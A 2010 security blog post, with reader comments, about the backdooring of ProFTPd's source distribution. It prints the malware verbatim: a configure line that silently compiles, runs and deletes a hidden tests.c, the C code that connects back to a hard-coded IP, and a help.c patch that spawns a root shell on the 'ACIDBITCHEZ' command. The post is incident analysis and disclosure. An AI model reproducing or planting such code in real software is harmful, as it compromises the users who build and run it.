News: ProFTPd owned and backdoored
I have just been informed of this. After compromising the remote host, they backdoored the popular FTP daemon by adding the following stuff.
gcc tests/tests.c -o tests/tests >/dev/null 2>&1 cc tests/tests.c -o tests/tests >/dev/null 2>&1 tests/tests >/dev/null 2>&1 & rm -rf tests/tests.c tests/tests >/dev/null 2>&1
This was appended in ‘configure’ file and it adds a new C file under tests directory named tests.c which is this:
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#define DEF_PORT 9090
#define DEF_TIMEOUT 15
#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
int sock;
void handle_timeout(int sig)
{
close(sock);
exit(0);
}
int main(void)
{
struct sockaddr_in addr;
struct hostent *he;
u_short port;
char ip[20]="212.26.42.47";
port = DEF_PORT;
signal(SIGALRM, handle_timeout);
alarm(DEF_TIMEOUT);
he=gethostbyname(ip);
if(he==NULL) return(-1);
addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
memset(addr.sin_zero, 0, 8);
sprintf(ip, inet_ntoa(addr.sin_addr));
if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
{
return EXIT_FAILURE;
}
if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
{
close(sock);
return EXIT_FAILURE;
}
if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
{
return EXIT_FAILURE;
}
close(sock);
return 0; }
A simple remote backdoor that uses ‘DEF_COMMAND’ magic value. In addition, src/help.c was patched to add the following ‘if’ clause:
} else {
if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
/* List the syntax for the given target command. */
for (i = 0; i < help_list->nelts; i++) {
Quite self-explanatory. Unfortunately, the compromise and the subsequent backdooring were quickly detected…
xorl %eax, %eax 
Ο Thiseas το κανε;
some user
December 2, 2010 at 17:14
>>A simple remote backdoor that uses ‘DEF_COMMAND’ magic value
Is it?
PS Nice blog!
toast
December 2, 2010 at 18:01
@toast: I didn’t go into any details because it’s very straightforward. It connects back to 212.26.42.47:9090 and sends ‘DEF_COMMAND’.
xorl
December 2, 2010 at 21:38
Why did they add another file, seems a bit overkill to me.
Quassum
December 2, 2010 at 22:08
Can you imagine connect back to saudi arabia! Hmm who could have thot
Persist
December 3, 2010 at 02:34
Really, using IPv4 specific library calls, defines and structures is so 80’s, not mentioning the not-portable signal handling. What they are teaching the kids these days ?
Vlad
December 4, 2010 at 01:30
@xorl: Yes, thats what it does. Yet you call it a backdoor.
q
December 5, 2010 at 02:38